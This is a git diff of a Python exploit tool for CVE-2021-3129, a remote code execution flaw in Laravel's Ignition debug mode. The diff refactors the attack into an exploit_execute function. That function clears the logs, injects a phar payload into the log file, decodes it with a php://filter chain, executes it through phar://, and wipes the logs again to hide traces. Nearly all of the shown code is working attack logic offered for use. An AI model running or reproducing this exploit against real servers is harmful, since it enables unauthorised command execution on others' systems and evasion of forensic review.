diff --git a/CVE-2021-3129.py b/CVE-2021-3129.py
index ea9d13f..d274905 100644
--- a/CVE-2021-3129.py
+++ b/CVE-2021-3129.py
@@ -110,53 +110,7 @@ def cmd_execute_cmd(self, cmd):
 i = i+1
 print(f"{PURPLE}[@] Trying chain {payload['name']} [{i}/{len(payloads)}]...")
- print(BLUE + "[@] Clearing logs...") # Step 1. Clear logs to prevent old payloads executing.
- self.exploit_clear_logs()
-
- print(BLUE + "[@] Causing error in logs...") # Step 2. Cause a error to write phar file.
- if self.exploit_cause_error().status_code != 500:
- print(RED + "[!] Failed causing error.")
- self.exploit_clear_logs()
- else:
- print(GREEN + "[โˆš] Caused error in logs.")
-
- print(BLUE + "[@] Sending payloads...")
-
- if self.exploit_request(payload['data'],
- 500).status_code != 500: # Step 3. Cause error with payload so payload in log file.
- print(RED + "[!] Failed sending payload.")
- self.exploit_clear_logs()
- else:
- print(GREEN + "[โˆš] Sent payload.")
-
- print(BLUE + "[@] Converting payload...") # Step 4. Change te log file into the payload in the log file.
- if (self.exploit_request(
- f"php://filter/read=convert.quoted-printable-decode|"
- f"convert.iconv.utf-16le.utf-8|"
- f"convert.base64-decode/resource={self.log_path}",
- 200).status_code != 200):
- print(RED + "[!] Failed converting payload.")
- self.exploit_clear_logs()
- else:
- print(GREEN + "[โˆš] Converted payload.")
-
- exploited = self.exploit_request(f"phar://{self.log_path}", 500) # Step 5. Let host execute phar script.
- if exploited.status_code == 500 and "cannot be empty" in exploited.text:
- print(GREEN + "[โˆš] Result:")
- result = exploited.text.split("")[1]
- print(END + result)
-
- print(BLUE + "[@] Clearing logs...") # Step 6. Remove logs so phar is not downloadable/executable.
- else:
- error_search = r"๐Ÿงจ (.*?)<\/title>"
- error_result = re.search(error_search, exploited.text)
- if error_result:
- print(RED + f"[!] Failed execution of payload.\nError: \"{error_result[1]}\".")
- else:
- print(RED + "[!] 
Failed execution of payload.") - - self.exploit_clear_logs() - self.exploit_clear_logs() + self.exploit_execute(payload['data']) if i < len(payloads): next_chain = input(PURPLE + "[?] Do you want to try the next chain? [Y/N] : ") @@ -165,7 +119,6 @@ def cmd_execute_cmd(self, cmd): else: break - def cmd_execute_write(self, text): print(DARKCYAN + f"[@] Writing to log file: \"{text}\"...") payload = self.generate_write_payload(text, 16) 
@@ -202,6 +155,60 @@ def exploit_clear_logs(self) -> requests.Response: # Clear entire log file
 def exploit_cause_error(self) -> requests.Response: # Cause error by sending path parameter
 return self.exploit_request("AA", 500)
+ def exploit_execute(self, payload):
+ success = True
+ print(BLUE + "[@] Clearing logs...") # Step 1. Clear logs to prevent old payloads executing.
+ self.exploit_clear_logs()
+
+ print(BLUE + "[@] Causing error in logs...") # Step 2. Cause a error to write phar file.
+ if self.exploit_cause_error().status_code != 500:
+ print(RED + "[!] Failed causing error.")
+ self.exploit_clear_logs()
+ success = False
+ else:
+ print(GREEN + "[โˆš] Caused error in logs.")
+
+ print(BLUE + "[@] Sending payloads...")
+
+ if self.exploit_request(payload, 500).status_code != 500: # Step 3. Cause error with payload so payload in log file.
+ print(RED + "[!] Failed sending payload.")
+ self.exploit_clear_logs()
+ success = False
+ else:
+ print(GREEN + "[โˆš] Sent payload.")
+
+ print(BLUE + "[@] Converting payload...") # Step 4. Change te log file into the payload in the log file.
+ if (self.exploit_request(
+ f"php://filter/read=convert.quoted-printable-decode|"
+ f"convert.iconv.utf-16le.utf-8|"
+ f"convert.base64-decode/resource={self.log_path}",
+ 200).status_code != 200):
+ print(RED + "[!] Failed converting payload.")
+ self.exploit_clear_logs()
+ success = False
+ else:
+ print(GREEN + "[โˆš] Converted payload.")
+
+ exploited = self.exploit_request(f"phar://{self.log_path}", 500) # Step 5. Let host execute phar script.
+ if exploited.status_code == 500 and "cannot be empty" in exploited.text:
+ print(GREEN + "[โˆš] Result:")
+ result = exploited.text.split("</html>")[1]
+ print(END + result)
+ else:
+ error_search = r"<title>๐Ÿงจ (.*?)<\/title>"
+ error_result = re.search(error_search, exploited.text)
+ if error_result:
+ print(RED + f"[!] Failed execution of payload.\nError: \"{error_result[1]}\".")
+ success = False
+ else:
+ print(RED + "[!] 
Failed execution of payload.") + success = False + + self.exploit_clear_logs() + self.exploit_clear_logs() + + return success + def random_useragent(self) -> str: # Get random user agent from constant list return random.choice(USER_AGENTS) @@ -410,7 +417,7 @@ def find_laravel_version(self, content: str): def validate_url(url: str) -> bool: # https://stackoverflow.com/a/7160778 regex = re.compile( - r'^(?:http|ftp)s?://' # http:// or https:// + r'^(?:http)s?://' # http:// or https:// r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain... r'localhost|' # localhost... r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip